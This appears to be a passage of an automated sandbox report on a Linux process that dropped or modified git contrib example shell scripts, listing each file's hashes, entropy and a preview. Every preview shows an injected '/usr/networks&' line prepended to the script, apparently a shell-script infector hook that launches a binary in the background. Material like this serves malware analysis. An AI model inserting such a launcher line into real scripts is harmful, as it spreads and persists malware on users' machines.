                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11759
                                                                                                                                Entropy (8bit):5.2205279036587235
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                                                MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                                                SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                                                SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                                                SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                                                /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13843
                                                                                                                                Entropy (8bit):5.402105827507175
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                                                MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                                                SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                                                SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                                                SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                                                /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5954
                                                                                                                                Entropy (8bit):5.053117199381536
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                                                MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                                                SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                                                SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                                                SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                                                /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):61
                                                                                                                                Entropy (8bit):4.0161977906092705
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                                                MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                                                SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                                                SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                                                SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):234
                                                                                                                                Entropy (8bit):4.9965164312586925
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                                                MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                                                SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                                                SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                                                SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2436
                                                                                                                                Entropy (8bit):5.153713997451705
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                                                MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                                                SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                                                SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                                                SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                                                /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):247
                                                                                                                                Entropy (8bit):4.532049748049262
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                                                MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                                                SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                                                SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                                                SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12742
                                                                                                                                Entropy (8bit):5.053935136942481
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                                                MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                                                SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                                                SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                                                SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                                                /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4349
                                                                                                                                Entropy (8bit):4.9994650554848405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                                                MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                                                SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                                                SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                                                SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                                                /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2499
                                                                                                                                Entropy (8bit):5.168731776130111
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                                                MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                                                SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                                                SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                                                SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                                                /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1947
                                                                                                                                Entropy (8bit):5.193786239756587
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                                                MD5:F1EDF5EE98492845561257661376A072
                                                                                                                                SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                                                SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                                                SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                                                /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2433
                                                                                                                                Entropy (8bit):5.07831529192731
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                                                MD5:71B42464943116BC0925788790C82720
                                                                                                                                SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                                                SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                                                SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                                                /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4385
                                                                                                                                Entropy (8bit):5.300590299626365
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                                                MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                                                SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                                                SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                                                SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                                                /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1972
                                                                                                                                Entropy (8bit):5.222096129300364
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                                                MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                                                SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                                                SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                                                SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                                                /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):243
                                                                                                                                Entropy (8bit):5.091025781115778
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                                                MD5:BE780CC322587122E892D123BFF726B6
                                                                                                                                SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                                                SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                                                SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):792
                                                                                                                                Entropy (8bit):4.925184193549972
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                                                MD5:895868AC151D9953AD152F77240CF73D
                                                                                                                                SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                                                SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                                                SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):486
                                                                                                                                Entropy (8bit):5.198694046664742
